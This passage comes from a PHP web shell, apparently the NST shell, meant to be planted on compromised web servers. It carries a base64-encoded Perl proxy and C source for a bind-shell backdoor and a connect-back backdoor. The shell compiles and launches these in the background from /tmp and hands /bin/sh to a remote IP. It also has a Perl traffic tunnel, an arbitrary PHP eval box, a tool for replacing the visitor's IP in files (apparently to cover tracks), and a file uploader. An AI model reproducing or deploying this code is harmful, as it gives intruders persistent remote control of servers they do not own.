sNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
1342 
1343 if(is_writable("/tmp")){
1344 $fp=fopen("/tmp/nst_perl_proxy.pl","w");
1345 fwrite($fp,base64_decode($perl_proxy_scp));
1346 passthru("nohup perl /tmp/nst_perl_proxy.pl $port &");
1347 unlink("/tmp/nst_perl_proxy.pl");
1348 }else{
1349 if(is_writable(".")){
1350 mkdir(".nst_proxy_tmp");
1351 $fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
1352 fwrite($fp,base64_decode($perl_proxy_scp));
1353 passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
1354 unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
1355 rmdir(".nst_proxy_tmp");
1356 }
1357 }
1358 $show_ps="1";
1359 }#end of start perl_proxy
1360 
1361 if($_POST['c_bd']){
1362 $port=$_POST['port'];
1363 $c_bd_scp = "#define PORT $port
1364 #include <stdio.h>
1365 #include <signal.h>
1366 #include <sys/types.h>
1367 #include <sys/socket.h>
1368 #include <netinet/in.h>
1369 
1370 int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
1371 struct sockaddr_in serv_addr;
1372 struct sockaddr_in client_addr;
1373 
1374 int main ()
1375 {
1376     soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
1377     if (soc_des == -1)
1378         exit(-1);
1379     bzero((char *) &serv_addr, sizeof(serv_addr));
1380     serv_addr.sin_family = AF_INET;
1381     serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
1382     serv_addr.sin_port = htons(PORT);
1383     soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
1384     if (soc_rc != 0)
1385         exit(-1);
1386     if (fork() != 0)
1387         exit(0);
1388     setpgrp();
1389     signal(SIGHUP, SIG_IGN);
1390     if (fork() != 0)
1391         exit(0);
1392     soc_rc = listen(soc_des, 5);
1393     if (soc_rc != 0)
1394         exit(0);
1395     while (1) {
1396         soc_len = sizeof(client_addr);
1397         soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
1398         if (soc_cli < 0)
1399             exit(0);
1400         cli_pid = getpid();
1401         server_pid = fork();
1402         if (server_pid != 0) {
1403             dup2(soc_cli,0);
1404             dup2(soc_cli,1);
1405             dup2(soc_cli,2);
1406             execl(\"/bin/sh\",\"sh\",(char *)0);
1407             close(soc_cli);
1408             exit(0);
1409         }
1410     close(soc_cli);
1411     }
1412 }
1413 
1414 ";
1415 
1416 
1417 if(is_writable("/tmp")){
1418 $fp=fopen("/tmp/nst_c_bd.c","w");
1419 fwrite($fp,"$c_bd_scp");
1420 passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
1421 passthru("nohup /tmp/nst_bd &");
1422 unlink("/tmp/nst_c_bd.c");
1423 unlink("/tmp/nst_bd");
1424 }else{
1425 if(is_writable(".")){
1426 mkdir(".nst_bd_tmp");
1427 $fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
1428 fwrite($fp,"$c_bd_scp");
1429 passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
1430 passthru("nohup .nst_bd_tmp/nst_bd &");
1431 unlink(".nst_bd_tmp/nst_bd");
1432 unlink(".nst_bd_tmp/nst_c_bd.c");
1433 rmdir(".nst_bd_tmp");
1434 }
1435 }
1436 $show_ps="1";
1437 }#end of c bd
1438 
1439 
1440 if($_POST['bc_c']){ # nc -l -p 4500
1441 $port_c = $_POST['port_c'];
1442 $ip=$_POST['ip'];
1443 $bc_c_scp = "#include <stdio.h>
1444 #include <sys/types.h>
1445 #include <sys/socket.h>
1446 #include <unistd.h>
1447 #include <fcntl.h>
1448 
1449 #include <netinet/in.h>
1450 #include <netdb.h>
1451 
1452 int fd, sock;
1453 int port = $port_c;
1454 struct sockaddr_in addr;
1455 
1456 char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
1457 char shell[] = \"/bin/sh\";
1458 
1459 int main(int argc, char *argv[]) {
1460         while(argc<2) {
1461         fprintf(stderr, \" %s <ip> \", argv[0]);
1462         exit(0); }
1463 
1464 addr.sin_family = AF_INET;
1465 addr.sin_port = htons(port);
1466 addr.sin_addr.s_addr = inet_addr(argv[1]);
1467 fd = socket(AF_INET, SOCK_STREAM, 0);
1468 connect(fd, (struct sockaddr*)&addr, sizeof(addr));
1469 
1470 send(fd, mesg, sizeof(mesg), 0);
1471 
1472 dup2(fd, 0);
1473 dup2(fd, 1);
1474 dup2(fd, 2);
1475 execl(shell, \"in.telnetd\", 0);
1476 
1477 close(fd);
1478 return 1;
1479 }
1480 
1481 ";
1482 
1483 if(is_writable("/tmp")){
1484 if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
1485 if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
1486 $fp=fopen("/tmp/nst_c_bc_c.c","w");
1487 $bd_c_scp=str_replace("!n","\n",$bd_c_scp);
1488 fwrite($fp,"$bc_c_scp");
1489 passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
1490 passthru("nohup /tmp/nst_bc_c $ip &");
1491 unlink("/tmp/nst_bc_c");
1492 unlink("/tmp/nst_bc_c.c");
1493 }else{
1494 if(is_writable(".")){
1495 mkdir(".nst_bc_c_tmp");
1496 $fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
1497 $bd_c_scp=str_replace("!n","\n",$bd_c_scp);
1498 fwrite($fp,"$bc_c_scp");
1499 passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
1500 passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &");
1501 unlink(".nst_bc_c_tmp/nst_bc_c.c");
1502 unlink(".nst_bc_c_tmp/nst_bc_c");
1503 rmdir(".nst_bc_c_tmp");
1504 }
1505 }
1506 $show_ps="1";
1507 
1508 }#end of back connect C
1509 
1510 
1511 if($_POST['datapipe_pl']){
1512 $port_2=$_POST['port_2'];
1513 $port_3=$_POST['port_3'];
1514 $ip=$_POST['ip'];
1515 $datapipe_pl = "
1516 #!/usr/bin/perl
1517 # coded by CuTTer (rus hacker)
1518 use IO::Socket;
1519 use POSIX;
1520 
1521 \$localport=$port_2;
1522 \$host=\"$ip\";
1523 \$port=$port_3;
1524 
1525 \$daemon=1;
1526 
1527 \$DIR = undef;
1528 
1529 
1530 ### Âûâîäèòü ëîã ñîáûòèé (1-äà, 0-íåò)
1531 \$log=0;
1532 
1533 
1534 
1535 
1536 \$| = 1;
1537 
1538 if (\$daemon){
1539         print \"3anycKaeM daemon\n\";
1540 
1541         \$pid = fork;
1542         exit if \$pid;
1543         die \"Couldn't fork: \$!\" unless defined(\$pid);
1544         POSIX::setsid() or die \"Can't start a new session: \$!\";
1545 }
1546 
1547 %o = ('port' => \$localport,
1548           'toport' => \$port,
1549           'tohost' => \$host);
1550 
1551 \$ah = IO::Socket::INET->new(
1552                          'LocalPort' => \$localport,
1553                          'Reuse' => 1,
1554                          'Listen' => 10)
1555     || die \"Íåëüçÿ îòêðûòü ñîêåò äëÿ ñîåäèíåíèé: \$!\";
1556 
1557 print \"Íà÷èíàåì âûïîëíåíèÿ öèêëà.\n\" if \$log;
1558 \$SIG{'CHLD'} = 'IGNORE';
1559 \$num = 0;
1560 while (1) {
1561         \$ch = \$ah->accept();
1562         if (!\$ch) {
1563                 print STDERR \"Ïðåðâàíî âûïîëåíèå accept: \$!\n\";
1564                 next;
1565         }
1566 
1567         printf(\"Íîâûé êëèåíò: host %s, port %s.\n\",
1568         \$ch->peerhost(), \$ch->peerport()) if \$log;
1569         ++\$num;
1570         \$pid = fork();
1571         if (!defined(\$pid)) {
1572                 print STDERR \"Íåâîçìîæíî âûïîëíèòü fork: \$!\n\";
1573     } elsif (\$pid == 0) {
1574 
1575 ### Íîâûé ïðîöåññ
1576                 \$ah->close();
1577                 Run(\%o, \$ch, \$num);
1578         } else {
1579                 print \"Parent: Fork ïðîøåë óñïåøíî, çàêðûâàåì ñîêåò.\n\" if \$log;
1580                 \$ch->close();
1581         }
1582 }
1583 
1584 
1585 sub Run {
1586         my(\$o, \$ch, \$num) = @_;
1587         my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
1588                                                         'PeerPort' => \$o->{'toport'});
1589         print(\"Child: Äåëàåì ðåäèðåêò íà \$o->{'tohost'}, ïîðò \$o->{'toport'}.\n\") if \$log;
1590         if (!\$th) {
1591                 printf STDERR (\"Child: Ïðåðâàí ðåäèðåêò íà %s, ïîðò %s.\n\",
1592                 \$o->{'tohost'}, \$o->{'toport'});
1593                 exit 0;
1594         }
1595 
1596         my \$fh;
1597         if (\$o->{'dir'}) {
1598                 \$fh = Symbol::gensym();
1599                 open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
1600                 or die \"Child: Ïðåðâàíî ñîçäàíèå ëîã ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\";
1601         }
1602 
1603         \$ch->autoflush();
1604         \$th->autoflush();
1605         while (\$ch || \$th) {
1606                 print \"Child: Âêëþ÷àåì öèêë.\n\" if \$log;
1607                 my \$rin = \"\";
1608                 vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
1609                 vec(\$rin, fileno(\$th), 1) = 1 if \$th;
1610                 my(\$rout, \$eout);
1611                 select(\$rout = \$rin, undef, \$eout = \$rin, 120);
1612                 if (!\$rout  &&  !\$eout) {
1613                         print STDERR \"Child: Îøèáêà Timeout.\n\";
1614                 }
1615                 my \$cbuffer = \"\";
1616                 my \$tbuffer = \"\";
1617 
1618                 if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
1619                         print \"Child: Æäåì äàííûõ îò êëèåíòà.\n\" if \$log;
1620                         my \$result = sysread(\$ch, \$tbuffer, 1024);
1621                         if (!defined(\$result)) {
1622                                 print STDERR \"Child: Îøèáêà ïðè ñ÷èòûâàíèè äàííûõ êëèåíòà: \$!\n\";
1623                                 exit 0;
1624                         }
1625                         if (\$result == 0) {
1626                                 print \"Child: Êëèåíò îòñîåäèíèëñÿ.\n\" if \$log;
1627                                 exit 0;
1628                         }
1629 
1630                         print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
1631                 }
1632 
1633                 if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
1634                         print \"Child: Æäåì äàííûõ.\n\" if \$log;
1635                         my \$result = sysread(\$th, \$cbuffer, 1024);
1636                         if (!defined(\$result)) {
1637                                 print STDERR \"Child: Íåâîçìîæíî ñ÷èòàòü äàííûå: \$!\n\";
1638                                 exit 0;
1639                         }
1640 
1641                         if (\$result == 0) {
1642                                 print \"Child: Ïðîèçîøëî îòñîåäèíåíèå.\n\" if \$log;
1643                                 exit 0;
1644                         }
1645 
1646                         print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
1647             }
1648 
1649                 if (\$fh  &&  \$tbuffer) {
1650                         (print \$fh \$tbuffer);
1651                 }
1652 
1653                 while (my \$len = length(\$tbuffer)) {
1654                         print \"Child: Îòïðàâëÿåì \$len áàéò.\n\" if \$log;
1655                         my \$res = syswrite(\$th, \$tbuffer, \$len);
1656                         print \"Child: Äàííûå îòïðàâëåíû.\n\" if \$log;
1657                         if (\$res > 0) {
1658                                 \$tbuffer = substr(\$tbuffer, \$res);
1659                         } else {
1660                                 print STDERR \"Child: Íåâîçìîæíî îòïðàâèòü äàííûå: \$!\n\";
1661                         }
1662                 }
1663 
1664                 while (my \$len = length(\$cbuffer)) {
1665                         print \"Child: Îòïðàâëÿåì \$len áàéò êëèåíòó.\n\" if \$log;
1666                         my \$res = syswrite(\$ch, \$cbuffer, \$len);
1667                         print \"Child: Äàííûå îòïðàâëåíû..\n\" if \$log;
1668                         if (\$res > 0) {
1669                                 \$cbuffer = substr(\$cbuffer, \$res);
1670                         } else {
1671                                 print STDERR \"Child: Íåâîçìîæíî îòïðàâèòü äàííûå: \$!\n\";
1672                         }
1673                 }
1674         }
1675 }
1676 
1677 ";
1678 
1679 if(is_writable("/tmp")){
1680 $fp=fopen("/tmp/nst_perl_datapipe.pl","w");
1681 fwrite($fp,"$datapipe_pl");
1682 passthru("nohup perl /tmp/nst_perl_datapipe.pl &");
1683 unlink("/tmp/nst_perl_datapipe.pl");
1684 }else{
1685 if(is_writable(".")){
1686 mkdir(".nst_datapipe_tmp");
1687 $fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
1688 fwrite($fp,"$datapipe_pl");
1689 passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
1690 unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
1691 rmdir(".nst_datapipe_tmp");
1692 }
1693 }
1694 $show_ps="1";
1695 
1696 }#end of datapipe perl
1697 
1698 
1699 
1700 
1701 
1702 if($show_ps=="1"){
1703 print "<center><b>1</b></center><br><br>";
1704 print "<pre>";
1705 passthru("ps ux");
1706 print "</pre><br><br>";
1707 }
1708 
1709 
1710 
1711 echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
1712 <Br>
1713 md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/?q=releases&download=4>DOWNLOAD</a>]
1714 </form>
1715 ";
1716 @$md5=@$_POST['md5'];
1717 if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
1718 echo "<br>
1719 <form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
1720 if(@$_POST['base64']){
1721 @$base64=$_POST['base64'];
1722 echo "
1723 <b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
1724 Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
1725 echo "<br>
1726 <form method=post><b>DES:</b><br><input name=des size=30><br>
1727 John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
1728 if(@$_POST['des']){
1729 @$des=@$_POST['des'];
1730 echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
1731 
1732 print "
1733 <b>eval:</b<br>
1734 (example: print \"Hello World\";)
1735 <form method=post>
1736 <font color=red><b><?</b><br>
1737 <textarea name=eval rows=15 cols=113></textarea><br>
1738 <b>?></b></font><br>
1739 <input type=submit value=Run style='width:150px;'>
1740 </form><br>
1741 ";
1742 
1743 function eval_sl($editf){
1744 if(get_magic_quotes_gpc()==1){
1745 $editf=stripslashes($editf);
1746 }
1747 return $editf;
1748 }
1749 
1750 
1751 if($_POST['eval']){
1752 print "<b>RESULT:<br><br></b>";
1753 eval(eval_sl($_POST['eval']));
1754 print "<br><br>";
1755 
1756 print "<font color=green><b>PHP:</b><br>\r\n\r\n";
1757 print "<?\r\n";
1758 print "<br>";
1759 print htmlspecialchars(eval_sl(($_POST['eval'])));
1760 print "<br>";
1761 print "?>\r\n\r\n</font><br><br>";
1762 
1763 }
1764 
1765 echo $copyr;
1766 exit;}
1767 
1768 if(@$_GET['replace']=="1"){
1769 $ip=@$_SERVER['REMOTE_ADDR'];
1770 $d=$_GET['d'];
1771 $e=$_GET['e'];
1772 @$de=$d."/".$e;
1773 $de=str_replace("//","/",$de);
1774 $e=@$e;
1775 echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
1776 echo "
1777 Replace tool:<br>
1778 (You can replace any text)<br>
1779 File: $de<br>
1780 <form method=post>
1781 1. Your ip.<br>
1782 2. microsoft.com ip :)<br>
1783 Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
1784 <input type=submit name=doit value=Replace>
1785 </form>
1786 ";
1787 
1788 if(@$_POST['doit']){
1789 @$thisX=$_POST['thisX'];
1790 @$bythis=$_POST['bythis'];
1791 @$e=$_GET['e'];
1792 $filename="$d/$e";
1793 $fd = @fopen ($filename, "r");
1794 $rpl = @fread ($fd, @filesize ($filename));
1795 $re=str_replace("$thisX","$bythis",$rpl);
1796 $x=@fopen("$d/$e","w");
1797 @fwrite($x,"$re");
1798 echo "<br><center>$thisX Replaced by $bythis<br>
1799 [<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
1800 
1801 }
1802 echo $copyr;
1803 exit;}
1804 
1805 
1806 if(@$_GET['t']=="upload"){
1807 echo "<br>
1808 <a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
1809 File upload:<br>
1810 <form enctype=\"multipart/form-data\" method=post>
1811 <input type=file name=text size=50><br>
1812 <input name=where size=52 value='$d'><br>
1813 New file name:<br>
1814 <input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
1815 <input type=submit value=Upload name=uploadf>
1816 </form><br>
1817 ";
1818 
1819 if(@$_POST['uploadf']){
1820 $where=$_POST['where'];
1821 $newf=$_POST['newf'];
1822 $where=str_replace("//","/",$where);
1823 if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
1824 $uploadfile = "$where/".$newf;
1825 if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
1826 $uploadfile=str_replace("//","/",$uploadfile);
1827 echo "<i><br>Uploaded to $uploadfile</i><br>";
1828 }else{
1829 echo "<i><br>Error</i><br>";}
1830 }
1831 }
1832 
